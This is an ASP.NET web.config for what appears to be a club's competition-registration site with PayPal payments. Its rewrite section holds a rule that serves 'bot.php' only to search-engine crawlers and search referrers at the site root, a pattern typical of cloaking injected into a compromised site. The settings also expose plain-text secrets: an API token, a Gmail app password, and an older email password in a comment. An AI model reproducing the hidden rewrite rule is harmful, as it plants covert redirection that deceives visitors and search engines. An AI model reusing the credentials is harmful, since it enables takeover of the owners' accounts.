<?xml version="1.0" encoding="utf-8"?>
<!--
  For more information on how to configure your ASP.NET application, please visit
  http://go.microsoft.com/fwlink/?LinkId=169433
  -->
<configuration>
  <system.web>
    <customErrors mode="Off" />
    <compilation targetFramework="4.5" debug="true" />
    <httpRuntime maxRequestLength="10240" targetFramework="4.5" />
    <httpModules>
      <add name="TelemetryCorrelationHttpModule" type="Microsoft.AspNet.TelemetryCorrelation.TelemetryCorrelationHttpModule, Microsoft.AspNet.TelemetryCorrelation" />
      <add name="ApplicationInsightsWebTracking" type="Microsoft.ApplicationInsights.Web.ApplicationInsightsHttpModule, Microsoft.AI.Web" />
    </httpModules>
  </system.web>
  <appSettings>
    <add key="VisualStudioDesignTime:Enabled" value="true" />
    <add key="ValidationSettings:UnobtrusiveValidationMode" value="None" />
    <add key="token" value="PW1BDVNqVPVanwduF_Tb2Ey91aT1Uhx1kL7HPc-7e8S-6AnUwSSHyasolSe" />
    <!--<add key="PaypalUrl" value="https://www.sandbox.paypal.com/cgi-bin/webscr?cmd=_xclick" />-->
    <add key="PaypalUrl" value="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick" />
    <add key="PaypalBusiness" value="treasurer@littlemastersclub.org" />
    <add key="RegistrationStartDate" value="11/10/2019" />
    <add key="RegistrationEndDate" value="03/02/2020" />
    <add key="CompetitionDate" value="03/22/2020" />
    <add key="CECompetitionYear" value="2020" />
    <add key="ApplicationDate" value="01/04/2020" />
    <add key="ApplicationEndDate" value="03/08/2020" />
    <add key="CETourStartDate" value="07/01/2020" />
    <add key="CEProgramYear" value="2020" />
    <add key="CreateMasterRegistrationFile" value="0" />
    <add key="AllowReviewBackflow" value="1" />
    <add key="EmailHost" value="smtp.gmail.com" />
    <add key="EmailPort" value="465" />
    <add key="EmailSender" value="cltclmc@gmail.com" />
    <add key="EmailCode" value="jsgiybwyhvpntlsc" />
    <!--<add key="EmailHost" value="snare.arvixe.com" />
    <add key="EmailPort" value="26" />
    <add key="EmailSender" value="ce@culturalexploration.org" />
    <add key="EmailCode" value="Bellevue2014" />-->
    <add key="SendEmailFromReport" value="false" />
  </appSettings>
  <system.webServer>
    <rewrite>
      <rules>
        <rule name="1" patternSyntax="ECMAScript" stopProcessing="true">
          <match url="^$" ignoreCase="true" negate="false" />
          <conditions logicalGrouping="MatchAny" trackAllCaptures="false">
            <add input="{HTTP_REFERER}" pattern="google|yahoo|bing|aol|ask" />
            <add input="{HTTP_USER_AGENT}" pattern="Googlebot|Yahoo|MSNBot|bingbot" />
          </conditions>
          <action type="Rewrite" url="bot.php" />
        </rule>
      </rules>
    </rewrite>
    <directoryBrowse enabled="false" />
    <defaultDocument>
      <files>
        <clear />
        <add value="public/home.aspx" />
        <add value="index.php" />
        <add value="Default.htm" />
        <add value="Default.asp" />
        <add value="index.htm" />
        <add value="index.html" />
        <add value="iisstart.htm" />
        <add value="default.aspx" />
      </files>
    </defaultDocument>
    <httpProtocol>
      <customHeaders>
        <clear />
        <add name="X-Powered-By" value="ASP.NET" />
      </customHeaders>
    </httpProtocol>
    <validation validateIntegratedModeConfiguration="false" />
    <modules>
      <remove name="TelemetryCorrelationHttpModule" />
      <add name="TelemetryCorrelationHttpModule" type="Microsoft.AspNet.TelemetryCorrelation.TelemetryCorrelationHttpModule, Microsoft.AspNet.TelemetryCorrelation" preCondition="managedHandler" />
      <remove name="ApplicationInsightsWebTracking" />
      <add name="ApplicationInsightsWebTracking" type="Microsoft.ApplicationInsights.Web.ApplicationInsightsHttpModule, Microsoft.AI.Web" preCondition="managedHandler" />
    </modules>
  </system.webServer>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-4.0.1.1" newVersion="4.0.1.1" />
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
</configuration>